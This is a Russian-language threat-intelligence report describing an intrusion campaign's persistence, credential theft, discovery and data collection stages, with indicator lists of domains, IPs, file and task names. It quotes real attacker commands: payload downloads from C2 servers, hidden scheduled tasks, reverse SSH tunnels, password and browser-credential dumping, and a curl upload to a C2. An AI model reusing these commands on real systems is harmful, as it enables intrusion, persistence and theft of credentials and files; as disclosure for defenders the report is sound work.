2. Закрепление (Persistence), предотвращение обнаружения (Defence Evasion)
Используемые инструменты:
- PhantomTaskShell
- PhantomProxyLite
- MeshAgent
- OpenSSH
- RSocx
Используемая инфраструктура:
austolns.pw
mgfoms.org
nextcloud.soft-trust.com
nextcloud.1cbit.dev
nextcloud.trust-sec.it.com
softline-solutions.cloud
194.87.253.233
213.232.204.110
194.116.215.36
46.8.71.104
217.19.4.206
91.239.148.211
193.187.174.251
185.130.251.227
195.133.32.213
193.187.174.3
194.116.215.166
185.130.251.219
88.66.89.231
188.127.254.234
91.219.151.103
91.219.151.59
45.8.228.253
45.158.169.131
Процедуры:
- С использованием PhantomRAT или PhantomRShell загрузка архива с экземпляром MeshAgent с одного из payload-хабов, распаковка и создание в планировщике Windows задачи на его ежедневный скрытый запуск в 10 часов утра:
Загрузка MeshAgent с VPS-сервера
iwr -Uri "http://188.127.254.234:443/remote.zip" -OutFile "C:\ProgramData\remote.zip"
iwr -Uri "http://188.127.254.234:80/dnsclient.zip" -OutFile "C:\ProgramData\dnsclient.zip"
iwr -Uri http://188.127.254.234:80/inetpub.zip -OutFile C:\ProgramData\inetpub.zip
certutil.exe -urlcache -f http://188.127.254.234:80/remote.zip C:\ProgramData\remote.zip
Загрузка MeshAgent со взломанного сайта
up https://<redacted>/inetpub.zip C:\ProgramData\inetpub.zip
Загрузка MeshAgent с фишингового сайта с fake CAPTCHA
powershell -WindowStyle Hidden -Command "& {iwr 'https://mgfoms.org/in.php?action=2' -OutFile '%userprofile%\dnsclient.exe'; Start-Process '%userprofile%\dnsclient.exe' -ArgumentList 'run' -WindowStyle Hidden}"
Распаковка MeshAgent
expand-archive -force -path C:\ProgramData\inetpub.zip -destinationpath C:\ProgramData\
expand-archive -force -path C:\ProgramData\dnsclient.zip -destinationpath C:\ProgramData\
Создание задачи в планировщике Windows
schtasks /create /sc DAILY /tn \"Microsoft Update\" /tr \"C:\ProgramData\YandexCloud\dnsclient.bat\" /mo 1 /st 10:00
schtasks /create /sc DAILY /tn \"Microsoft Update\" /tr \"C:\ProgramData\YandexCloud\dnsclient.bat\" /st 10:00
schtasks /create /sc DAILY /tn \"Microsoft Update\" /tr \"C:\ProgramData\YandexCloud\dnsclient.bat\" /st 10:01 /f
schtasks /create /sc DAILY /tn \"Yandex Update\" /tr \"powershell -WindowStyle Hidden -Command Start-Process 'C:\ProgramData\inetpub.exe' -ArgumentList 'run' -WindowStyle Hidden\" /mo 1 /st 10:00 /ri 5
schtasks /create /sc DAILY /tn DNS /tr \"powershell -WindowStyle Hidden -Command Start-Process 'C:\ProgramData\dnsclient.exe' -ArgumentList 'run' -WindowStyle Hidden\" /f /st 10:00
schtasks /create /sc DAILY /tn DNS /tr \"powershell -WindowStyle Hidden -Command Start-Process 'C:\ProgramData\inetpub.exe' -ArgumentList 'run' -WindowStyle Hidden\" /f /st 10:00
- С использованием PhantomRAT или PhantomRShell загрузка и установка клиента OpenSSH из официального GitHub-репозитория, организация обратного (reverse) SSH-туннеля на сетевом порте 80 (HTTP) либо 443 (HTTPS) с опцией аутентификации без пароля и ключа, создание в планировщике Windows задачи на его ежедневный запуск в 9 часов утра:
Загрузка и установка клиента OpenSSH
msiexec /qn /i https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.8.3.0p2-Preview/OpenSSH-Win64-v9.8.3.0.msi
Листинг директории OpenSSH
dir "C:\Program Files\OpenSSH"
dir \"C:\Program Files\OpenSSH\"
dir C:\windows\system32\Openssh
Просмотр версии SSH
Организация SSH-туннеля
ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 37124 -p 80 vtvvuaweuvefafoewfau9124124615@195.133.32.213
ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 31238 -p 443 vtvvuaweuvefafoewfau9124124615@195.133.32.213
ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 37581 -p 443 cfyvg84df17842o@185.130.251.227
Создание задачи в планировщике Windows
schtasks /create /sc DAILY /tn SSH /tr \"C:\Windows\system32\OpenSSH\ssh.exe -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 52213 -p 443 cfyvg84df17842o@185.130.251.227\" /f /st 09:00
schtasks /create /sc DAILY /tn Update /tr \"'C:\Windows\system32\OpenSSH\ssh.exe' -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 52127 -p 443 cfyvg84df17842o@185.130.251.227\" /st 09:00
- С использованием PhantomRAT или PhantomRShell загрузка экземпляра RSocx со взломанного легитимного сайта, распаковка и скрытый запуск, установка сетевого соединения с сетевым портом 443 (HTTPS) или 8080 (HTTP) C2-сервера по протоколу SOCKS5:
Загрузка RSocx
up https://<redacted>/hosts.zip C:\ProgramData\hosts.zip
Распаковка RSocx
powershell expand-archive -force -path "C:\\ProgramData\\hosts.zip" -destinationpath "C:\\ProgramData\\"
Запуск RSocx
C:\ProgramData\hosts.exe -r 193.187.174.251:443
C:\ProgramData\hosts.exe -r 195.133.32.213:8080
start /B "" "C:\\ProgramData\\hosts.exe -r 193.187.174.251:443"
Start-Process -FilePath "C:\ProgramData\hosts.exe" -ArgumentList "-r 193.187.174.251:443" -NoNewWindow
Start-Process -FilePath \"C:\ProgramData\hosts.exe\" -ArgumentList \"-r 193.187.174.251:443\" -NoNewWindow
- С использованием PhantomRAT или PhantomRShell загрузка экземпляра PhantomTaskShell со взломанного сайта, распаковка и запуск в зараженной системе:
Загрузка PhantomTaskShell
up https://<redacted>/update.zip C:\ProgramData\update.zip
Распаковка PhantomTaskShell
expand-archive -force -path C:\ProgramData\update.zip -destinationpath C:\ProgramData\
Запуск PhantomTaskShell
powershell C:\ProgramData\MicrosoftAppStore\update.ps1
powershell C:\ProgramData\YandexCloud\update.ps1
3. Получение учетных данных (Credential Access)
Используемые инструменты:
- XenArmor All-In-One Password Recovery Pro
- PhantomStealer
Используемая инфраструктура:
Процедуры:
- С использованием PhantomTaskShell, получающего команды от панели управления Phantom, загрузка утилиты восстановления паролей XenArmor All-In-One Password Recovery Pro с payload-хаба, распаковка и запуск в зараженной системе с опцией записи обнаруженных и восстановленных параметров аутентификации в HTML-файл, удаление утилиты из системы:
Загрузка XenArmor All-In-One Password Recovery Pro
iwr -Uri "http://188.127.254.234:80/one.zip" -OutFile "C:\ProgramData\one.zip"
Распаковка утилиты
expand-archive -force -path C:\ProgramData\one.zip -destinationpath C:\ProgramData
Запуск утилиты с записью результатов в HTML-файл
C:\ProgramData\XenAllPasswordPro.exe -a C:\ProgramData\<redacted>.html
Удаление утилиты
del C:\ProgramData\one.zip
del C:\ProgramData\XenAllPasswordPro.exe
- С использованием PhantomTaskShell, получающего команды от панели управления Phantom, загрузка стилера PhantomStealer с payload-хаба, распаковка и запуск в зараженной системе с опцией копирования параметров аутентификации, сохраненных в известных браузерах, и удаление стилера из системы:
Загрузка PhantomStealer
iwr -Uri "http://188.127.254.234:80/browser.zip" -OutFile "C:\ProgramData\browser.zip"
Распаковка PhantomStealer
expand-archive -force -path C:\ProgramData\browser.zip -destinationpath C:\ProgramData\
Запуск PhantomStealer
C:\ProgramData\browser.exe chrome -c
cd C:\ProgramData; .\browser.exe yandex -c
Удаление PhantomStealer
del "C:\ProgramData\browser.exe"
4. Обнаружение (Discovery), перемещение внутри периметра (Lateral Movement)
Используемые инструменты:
Используемая инфраструктура:
Процедуры (выполняются с использованием бэкдора PhantomTaskShell, получающего команды от панели управления Phantom):
- Получение информации о локальных пользователях:
- Получение информации о пользователях и группах Active Directory:
net user
net user /domain
net user <redacted> /domain
net group /domain
net group \"Domain Admins\" /domain
<redacted>, <redacted> | ForEach-Object { net user $_ /domain }
- Получение информации об операционной и файловой системах:
systeminfo
wmic logicaldisk get caption
- Получение информации о системных процессах и службах:
- Изучение конфигураций Windows Defender:
dir S:\
dir C:\
dir C:\users\<redacted>
dir C:\users\<redacted>\documents
dir C:\users\<redacted>\downloads
dir C:\users\<redacted>\desktop
dir C:\Users\<redacted>\AppData\Roaming
dir C:\ProgramData
dir \"C:\Program Files (x86)\"
pwd
- Изучение сетевого окружения и параметров маршрутизации:
arp -a
ipconfig
route print
nestat -ano
nslookup 127.0.0.1
nslookup <redacted>.ru
ping 10.64.70.172 -n 1
ping <redacted> -n 2
- Отправка информации о зараженной системе на C2-сервер:
C:\Windows\System32\curl.exe -v -F "file=@C:\ProgramData\user_report.txt" -F "destinationPath=./user_report.txt" http://185.130.249.224:80/upload
5. Сбор (Collection) и эксфильтрация данных (Exfiltration)
Используемые инструменты:
Используемая инфраструктура:
Процедуры:
- С использованием PhantomTaskShell, получающего команды от панели управления Phantom, запуск утилиты certutil.exe в составе служб сертификатов Windows c параметрами -urlcache и -f и загрузка экземпляра RClone и его конфигурационного файла с 8000 сетевого порта C2-сервера:
certutil.exe -urlcache -f "http://195.133.32.213:8000/srvhost.exe" "C:\ProgramData\srvhost.exe"
certutil.exe -urlcache -f "http://195.133.32.213:8000/wusa.conf" "C:\ProgramData\wusa.conf"
- С использованием PhantomTaskShell, получающего команды от панели управления Phantom, загрузка с 80 сетевого порта C2-сервера и распаковка экземпляра неизвестного PowerShell-скрипта (получить в рамках исследования не удалось):
iwr -Uri "http://188.127.254.234:80/load.zip" -OutFile "C:\\ProgramData\\load.zip
expand-archive -force -path C:\ProgramData\load.zip -destinationpath C:\ProgramData\
- С использованием PhantomTaskShell, получающего команды от панели управления Phantom, запуск PowerShell-инструмента с отключенной политикой выполнения скриптов и опциями -r (рекурсивный поиск) и -e (список расширений файлов). Сбор документов Microsoft Office и текстовых файлов, графических изображений, LNK-файлов, а также файлов конфигурации RDP- и OpenVPN-подключений:
powershell -ex bypass C:\ProgramData\load.ps1 -Path C:\Users\ -r -e "pdf,xls,xlsx,doc,docx,txt,jpg,ovpn,rdp,lnk"
del "C:\ProgramData\wusa.conf"
del "C:\ProgramData\srvhost.exe"
del "C:\ProgramData\load.ps1"
del "C:\ProgramData\load.zip"
Директории, используемые для хранения инструментов:
C:\ProgramData\
C:\ProgramData\YandexCloud
C:\ProgramData\MicrosoftAppStore
C:\Windows\system32\OpenSSH
Названия задач в планировщике задач Windows:
Yandex Update
Microsoft Update
Update
SSH
DNS
Мимикрия под легитимные файлы в названиях инструментов:
ssh.exe
hosts.exe
inetpub.exe
srvhost.exe
Имена вредоносных файлов:
dnsclient.zip
dnsclient.bat
inetpub.zip
inetpub.exe
hosts.zip
hosts.exe
update.zip
update.ps1
remote.zip
remote.exe
remote.dll
load.zip
load.ps1
one.zip
one.exe
xenallpassword.exe
browser.zip
browser.exe
srvhost.exe
wusa.conf